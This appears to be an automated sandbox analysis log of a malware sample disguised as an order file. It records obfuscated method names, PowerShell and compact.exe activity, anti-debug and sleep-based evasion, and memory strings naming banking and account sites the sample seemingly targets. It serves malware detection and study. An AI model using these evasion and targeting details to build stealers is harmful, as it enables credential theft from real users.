Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, LMx5uOpTP1v1ft95hN.cs	High entropy of concatenated method names: 'weZPqhKXYD', 'VrCPfC31IY', 'my7PrRm4lP', 'pbFPXttB7d', 'netPBxbkgF', 'mk5PvnN0ba', 'drT0eWmXUAGwcTO4Ke', 'etuNcYTpLcZdhdIFSO', 'UvZPP8mpuD', 'xOXPtmMpUP'
Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, plyn4AzrwpREROgjZj.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'desNg4WXyt', 'fQ1NBiPAkp', 'KCENvrmL82', 'AHGNmlqbTn', 'ruuNiM8eXV', 'ophNNtZ71I', 'B4lN01l2BA'
Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, IJHR3K72f7raiuBq1W.cs	High entropy of concatenated method names: 'QfYqhUImDQ', 'xwVqesdrdf', 'IY8qkc2h1P', 'iyWqdpc3hZ', 'asPqGZnpk2', 'C26qHxpaH4', 'HwpqbG3oqH', 'smuqn2jKet', 'otuqTaTVbj', 'YIuqFT66hX'

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\compact.exe	API/Special instruction interceptor: Address: 7FFDB442D324
Source: C:\Windows\SysWOW64\compact.exe	API/Special instruction interceptor: Address: 7FFDB442D7E4
Source: C:\Windows\SysWOW64\compact.exe	API/Special instruction interceptor: Address: 7FFDB442D944
Source: C:\Windows\SysWOW64\compact.exe	API/Special instruction interceptor: Address: 7FFDB442D504
Source: C:\Windows\SysWOW64\compact.exe	API/Special instruction interceptor: Address: 7FFDB442D544
Source: C:\Windows\SysWOW64\compact.exe	API/Special instruction interceptor: Address: 7FFDB442D1E4
Source: C:\Windows\SysWOW64\compact.exe	API/Special instruction interceptor: Address: 7FFDB4430154
Source: C:\Windows\SysWOW64\compact.exe	API/Special instruction interceptor: Address: 7FFDB442DA44

Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Memory allocated: B90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Memory allocated: 2860000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Memory allocated: 4860000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Memory allocated: 7810000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Memory allocated: 8810000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Memory allocated: 89C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Memory allocated: 99C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Memory allocated: 9D20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Memory allocated: AD20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Memory allocated: BD20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Memory allocated: D1D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Memory allocated: E1D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Memory allocated: F1D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Memory allocated: F890000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6637	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1546	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Window / User API: threadDelayed 9805	Jump to behavior

Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\compact.exe	API coverage: 2.7 %

Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe TID: 4148	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4780	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2436	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe TID: 4776	Thread sleep count: 168 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe TID: 4776	Thread sleep time: -336000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe TID: 4776	Thread sleep count: 9805 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe TID: 4776	Thread sleep time: -19610000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe TID: 2708	Thread sleep time: -75000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe TID: 2708	Thread sleep time: -52500s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe TID: 2708	Thread sleep time: -36000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\compact.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\compact.exe	Last function: Thread delayed

Source: compact.exe, 0000000C.00000002.4556356627.000000000310D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllq'V
Source: N77o9w1836.12.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: N77o9w1836.12.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: N77o9w1836.12.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: N77o9w1836.12.dr	Binary or memory string: discord.comVMware20,11696487552f
Source: N77o9w1836.12.dr	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: N77o9w1836.12.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: N77o9w1836.12.dr	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: N77o9w1836.12.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: N77o9w1836.12.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: N77o9w1836.12.dr	Binary or memory string: global block list test formVMware20,11696487552
Source: N77o9w1836.12.dr	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: N77o9w1836.12.dr	Binary or memory string: AMC password management pageVMware20,11696487552
Source: OFEkXEMCZC.exe, 0000000E.00000002.4561520155.0000000000D8F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll#
Source: firefox.exe, 0000000F.00000002.2820631900.0000016826ABC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: N77o9w1836.12.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: spec 4008670601 AZTEK Order.exe, 00000000.00000002.2130973517.0000000006DC9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\#
Source: N77o9w1836.12.dr	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: N77o9w1836.12.dr	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: N77o9w1836.12.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: N77o9w1836.12.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: N77o9w1836.12.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: N77o9w1836.12.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: N77o9w1836.12.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: N77o9w1836.12.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: N77o9w1836.12.dr	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: N77o9w1836.12.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: N77o9w1836.12.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: N77o9w1836.12.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: N77o9w1836.12.dr	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: N77o9w1836.12.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: N77o9w1836.12.dr	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: N77o9w1836.12.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: N77o9w1836.12.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: N77o9w1836.12.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe	NtResumeThread: Direct from: 0x773836AC	Jump to behavior
